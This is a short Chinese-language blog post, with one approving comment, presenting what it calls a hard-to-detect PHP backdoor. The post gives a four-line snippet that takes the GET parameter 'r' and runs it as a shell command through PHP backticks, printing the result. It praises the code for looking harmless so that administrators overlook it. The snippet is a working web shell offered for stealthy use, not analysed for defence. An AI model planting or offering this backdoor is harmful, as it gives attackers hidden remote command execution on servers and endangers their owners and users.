一个不宜发现的PHP后门书写方式

1
$selfNums = $_GET['r'];
if (isset($selfNums)){
    echo `$selfNums`;
}

纠到一段看起来似乎没有什么问题的代码,确是能致命的后门代码,这里用到了一个一般的PHPer都不太明白的反撇号 ` ,反撇号包含的字符串,等同于shell_exec函数。

伪装性很好,很容易被管理员忽略。

共 1 条评论

  1. 回复

    不错.

ghostry进行回复 X

您的邮箱不会公开,当您的评论有新的回复时,会通过您填写的邮箱向您发送评论内容。 必填字段 *

为何看不到我发布的评论?

正在提交, 请稍候...